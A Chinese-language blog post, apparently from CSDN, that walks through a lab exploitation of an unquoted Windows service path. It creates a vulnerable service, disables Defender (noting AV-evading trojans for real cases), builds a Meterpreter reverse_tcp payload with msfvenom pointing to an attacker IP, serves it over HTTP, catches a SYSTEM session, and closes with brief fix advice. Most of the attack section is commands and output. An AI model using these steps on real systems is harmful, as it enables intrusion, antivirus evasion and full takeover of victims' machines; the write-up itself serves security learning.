带空格的系统服务提权

最新推荐文章于 2024-07-28 15:46:11 发布
最新推荐文章于 2024-07-28 15:46:11 发布
阅读量89 收藏 1
点赞数
分类专栏: Windows提权 文章标签: python 服务器 系统安全 windows linux 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46686336/article/details/134355729
版权

带空格的系统服务提权

一、漏洞原理和利用条件
1、漏洞原理

当系统管理员配置Windows服务时,必须指定要执行的命令,或者运行可执行文件的路径。当Windows服务运行时,会发生以下两种情况之一。如果给出了可执行文件,并且引用了完整路径,则系统会按字面解释它并执行。但是,如果文件路径没有被双引号包裹的话,空格会截断文件路径,空格前的路径会被当做目标路径

2、利用条件

看到服务执行路径存在空格并没有加引号,路径可写即可利用该漏洞

二、漏洞环境复现
1、开启漏洞服务
C:\Users\Administrator>sc create test_server6 binpath="E:\bin 123\calc.exe" start=auto
[SC] CreateService 成功

C:\Users\Administrator>sc query test_server6

SERVICE_NAME: test_server6
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 1077  (0x435)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

在这里插入图片描述

2、关闭Defender

这里我们需要把Windows默认的防病毒关闭,实际情况可以使用免杀的木马进行绕过

在这里插入图片描述

永久关闭Defender

在这里插入图片描述

好的这边漏洞环境已经,准备好了现在我们切换到test用户进行提权

三、提权过程
1、Kali制作反弹shell木马
#生成木马,需要自动迁移进程
msf6 > msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.88.141 lport=4444 prependmigrateprocess=explorer.exe prependmigrate=true -f exe > windows.exe
[*] exec: msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.88.141 lport=4444 prependmigrateprocess=explorer.exe prependmigrate=true -f exe > windows.exe

Overriding user environment variable 'OPENSSL_CONF' to enable legacy functions.
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 901 bytes
Final size of exe file: 7168 bytes

msf6 > ls
[*] exec: ls

windows.exe

在这里插入图片描述

2、上传木马
#开启http服务
msf6 > python -m http.server 80
[*] exec: python -m http.server 80

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

在这里插入图片描述

下载木马

在这里插入图片描述

3、Kali开启监听
#后台监听
msf6 > handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.88.141 -P 4444
[*] Payload handler running as background job 0.

[*] Started reverse TCP handler on 192.168.88.141:4444 
#查看后台项目
msf6 > jobs 

Jobs
====

  Id  Name                    Payload                              Payload opts
  --  ----                    -------                              ------------
  0   Exploit: multi/handler  windows/x64/meterpreter/reverse_tcp  tcp://192.168.88.141:4444

在这里插入图片描述

4、更改木马名

在这里插入图片描述

重启计算机让服务启动起来,就把我们的木马给运行起来了

5、完成提权
msf6 > 
[*] Sending stage (200774 bytes) to 192.168.88.131
#查看会话
msf6 > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ DESKTOP-74FDETH  192.168.88.141:4444 -> 192.168.88.131:49668 (192.1
                                                                            68.88.131)

在这里插入图片描述

四、修复建议
1、尽量运行路径不带空格
2、如果必须空格就使用双引号包裹起来
3、取消用户对文件夹的修改权限
小冷爱学习!
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
系统提权之:Windows 提权
f_carey的博客
11-04 1321
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Windows 提权1 利用漏洞提权1.1 手工查找系统缺失补丁1.2 Windows 补丁审计工具1.2.1 Windows-Exploit-Suggester1.2.2 Sherlock1.3 MSF 模块查找可利用漏洞2 利用 Windows 配置错误提权2.1 系统服务权限配置错误2.1.1 利用 Po.
第四周-数据库系统功能相关学习-FNjoker-14961
08-03
本篇主要聚焦于MySQL的一些关键函数,包括字符串函数、数字函数、日期函数和其他特殊函数,以及涉及到的安全问题——UDF(User Defined Function)提权。 首先,我们关注的是MySQL的字符串函数。ASCII(s)函数返回...
将MongoDB安装为Windows服务时cmd命令下路径中存在空格的问题
sun2008mt的专栏
05-04 1075
安装完MongoDB数据库之后,可以将MongoDB安装为Windows服务。 首先,以管理员身份打开cmd窗口,并cd到MongoDB安装目录下的bin文件夹下。 然后,输入以下命令: mongod.exe --install --logpath=日志文件存放路径 --dbpath=数据库文件存放路径  [其他参数(mongod.exe --help查询)]
记一次bypass拿下主机过程
Adminxe的博客
04-24 784
0x00 前言 今天DR发来一个shell,提不上权,而且杀软挺狠,直接就开整,记录下思路。 0x01 全文快览 不给大佬看废话时间,突破线路如下: webshell–>突破cmd禁用–>重构EXP突破向日葵RCE–>突破提权获取lsass文件–>突破杀软查杀落地dmp文件–>突破windows defender AMSI–>突破某杀软拦截用户添加–>尝试RDP劫持–>浏览器解密碰撞密码获得权限。 0x02 shell环境 1、c...
MSF内网穿透
weixin_46686336的博客
11-08 374
MSF内网穿透
本地微信DLL劫持提权复现
weixin_46686336的博客
11-11 791
DLL劫持提权Windows提权
利用系统服务进行提权
m0_65554829的博客
11-19 316
利用用户对服务、注册表的配置疏忽而进行替换服务要启动的二进制文件进行提权
浅析Linux系统常规提权手段的原理与技巧
道阻且长,行则将至。
01-08 1293
渗透测试过程中,通过 Web 服务漏洞(比如文件上传漏洞)拿到服务器 Shell 后,经常会发现所获得的 Shell 仅有较低的权限,而为了进一步获得高权限 Shell(root),避免不了地就是进一步进行提权。本文来学习、总结下 Linux 系统一些常规的提权手段的原理与技巧。
系统提权——Windows系统提权
JulySec的博客
02-13 2027
系统提权——Windows系统提权。 1、使用系统命令提权; 2、进程注入; 3、令牌窃取; 4、DLL劫持; 5、不安全服务配置。 UAC机制的绕过
Windows系统常见提权方式
m0_64481831的博客
03-26 1407
提权依然要查看一些条件,最简单的办法就是直接尝试提权,能成功就成功,因为现实的环境都是很复杂的。
第62天:权限提升-烂土豆&dll劫持&引号路径&服务权限1
08-03
本文将深入探讨四种常见的提权技术:烂土豆、DLL劫持、不引号的服务路径以及不安全服务权限配置,并通过具体案例来解析这些技术的工作原理和利用过程。 首先,烂土豆是一种Windows权限提升漏洞,它允许攻击者...
117_Windows 本地特权提升技巧1
08-03
本文将深入探讨几种利用服务路径权限可控、模糊路径等方法进行提权的技术。 ### 0x01 服务路径权限可控提权Windows注册表中,服务的相关配置存储于`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services`下。...
晨讲面试题.docx
01-04
- 在提权过程中,尽量避免使用空格的目录,因为许多exploit执行需要空格作为参数分隔符。 12. **跨站影响**: - 如果两个站点A和B共享数据库,那么在A的后台创建的用户可能会同步到B的后台。 13. **注入技巧**...
IPC$空连接主机的攻击技巧
09-23
- **权限提升**: 获得普通用户权限后,寻找方法将其升级为超级用户权限,以便获得更高的系统控制权。 #### 4. 进一步的攻击行动 - **文件传输**: 成功连接后,攻击者可以使用`copy`命令上传恶意文件或修改目标主机...
快醒醒,别睡了!...讲《数据分析pandas库》了—/—<4>
qq_64603703的博客
07-27 723
详细解说数据分析pandas库中的常用方法
全网最详细Gradio教程系列5——Gradio Client: python
shao918516的博客
07-26 1002
程序部署完成后,如何将Gradio App作为API访问使用呢,这就用到Gradio Client。本章讲解Gradio Client的三种使用方式:python、javascript和curl,受字数限制,所以分三篇博客发布。 使用Gradio Python Client非常易于将Gradio应用程序作为API使用,本节讲述gradio_client安装、如何连接Gradio应用程序、查看可用API及其使用方式、job及session等用法。 通过Gradio Python Cli
全面解析 SnowNLP:中文文本处理、情感分析
有勇气的牛排博客
07-24 571
SnowNLP 是一个专门用于处理中文文本的 Python库。分词情感分析关键词提取文本分类拼音转换繁体转简体词相似度计算等测试环境:Python3.10.9尚未测出该功能text = "有勇气的牛排写的文章通俗易懂,爱了爱了"文本分类使用的是 SnowNLP 的情感分析模型。
Chapter 18 Python异常
最新发布
2302_80253507的博客
07-28 802
Python中,异常是一种特定的对象,能够在程序运行过程中被抛出和处理。有效地管理异常不仅可以增强程序的稳定性,还可以提高用户体验,使程序能够优雅地处理错误情况。本章详细讲解了异常的基本概念以及如何捕获和处理异常。
python输出空格
05-30
Python 中,可以使用 print() 函数输出空格的内容。例如,可以在 print() 函数中用逗号分隔多个字符串,这些字符串将被自动以空格分隔并输出到控制台上,如下所示: ``` print("Hello,", "world!") ``` 这将...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值